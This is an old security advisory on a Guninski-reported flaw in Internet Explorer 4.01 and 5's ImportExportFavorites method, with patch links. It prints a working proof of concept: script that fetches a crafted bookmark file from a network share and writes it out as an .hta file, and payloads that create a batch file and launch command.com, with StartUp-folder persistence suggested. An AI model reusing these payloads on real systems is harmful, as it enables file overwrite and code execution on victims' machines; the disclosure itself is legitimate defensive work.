COMMAND
IE
SYSTEMS AFFECTED
Microsoft Internet Explorer 4.01 and 5
PROBLEM
Georgi Guninski found following. Internet Explorer 5.0 under
Windows 95/NT 4.0 (suppose Win98 is vulnerable) allows creating
and overwriting local files and in SOME cases putting content in
them using the window.external.ImportExportFavorites() method.
In SOME cases putting content in the file is possible which means
arbitrary programs may be executed.
The problem is the window.external.ImportExportFavorites() method,
which is used to import and export bookmarks from and to Netscape
Communicator. The bigger problem is it allows creating and
overwriting files, which obviously leads to a dangerous DoS
attack. One may overwrite critical files which may lead to
reinstalling Windows. Example of this is:
<SCRIPT>
window.external.ImportExportFavorites(0,"c:\\fav.hta");
</SCRIPT>
which will create a file c:\fav.hta, containing IE's favorites
without asking the user, just notifying him the operation is
successfull. In SOME cases, HTML code may be injected in the
exported file by importing a specially designed HTML file. The
file to be imported may reside on a samba or Windows file server
and may be accessed by Microsoft Networking. The difficult part
is this must be exported by using only the <A> tag, but HTML
Applications help again.
Georgi has verified importing on a Windows NT 4.0 box directly
connected to Internet and it worked fine. But he could not
reproduce importing favorites with Windows 95 connected to
Internet via dial-up.
It is possible to import the file (favourites) using "http"
protocol, but then the user must click the default button YES,
Microsoft does not warn about any security problems in this case.
So the code looks like this (in a HTML file):
<SCRIPT>
// you must change the IP or make the file local !!!!!!!!!!
window.external.ImportExportFavorites(1,"\\\\1.1.1.1\\test\\fav.imp");
// Sure, the StartUp folder is better
window.external.ImportExportFavorites(0,"c:\\fav.hta");
</SCRIPT>
In the imported file (fav.imp), residing on a samba or Windows
server without authentication:
<!DOCTYPE NETSCAPE-Bookmark-file-1>
<DL>
<DT><A HREF="#" STYLE="left:expression(eval('f= new
ActiveXObject(\'Scripting.FileSystemObject\');a=f.CreateTextFile(\'C:\\\\GTEST.BAT\',true);a.WriteLine(\'echo
Hi\');a.WriteLine(\'pause\');a.close();alert(\'File C:\\\\GTEST.BAT
created\');window.close();'));" ADD_DATE="923225094"
LAST_VISIT="934146000" LAST_MODIFIED="923225096">123456</A>
<DT><A HREF="#" STYLE="left:expression(eval('a=new
ActiveXObject(\'WScript.Shell\');a.run(\'c:\\command.com\');alert(\'Program
started\');window.close()'));" ADD_DATE="923225094"
LAST_VISIT="934146000" LAST_MODIFIED="923225096">123455</A>
</DL>
To see the effect start c:\fav.hta (it may be placed in the
StartUp folder and executed automatically). This vulnerability
can be exploited via email or Usenet message using window.open().
The user must have installed file sharing in order remote
importing to work. Demonstration is available at:
http://www.nat.bg/~joro/imp.html
SOLUTION
Disable Active Scripting. Patch Availability:
- Internet Explorer 4.01 for Intel:
ftp://ftp.microsoft.com/peropsys/ie/ie-public/fixes/usa/IE401/ImportExportFavorites-fix/x86/q241361.exe
- Internet Explorer 4.01 for Alpha:
ftp://ftp.microsoft.com/peropsys/ie/ie-public/fixes/usa/IE401/ImportExportFavorites-fix/Alpha/q241361.exe
- Internet Explorer 5 for Intel:
ftp://ftp.microsoft.com/peropsys/ie/ie-public/fixes/usa/IE50/ImportExportFavorites-fix/x86/q241361.exe
- Internet Explorer 5 for Alpha:
ftp://ftp.microsoft.com/peropsys/ie/ie-public/fixes/usa/IE50/ImportExportFavorites-fix/Alpha/q241361.exe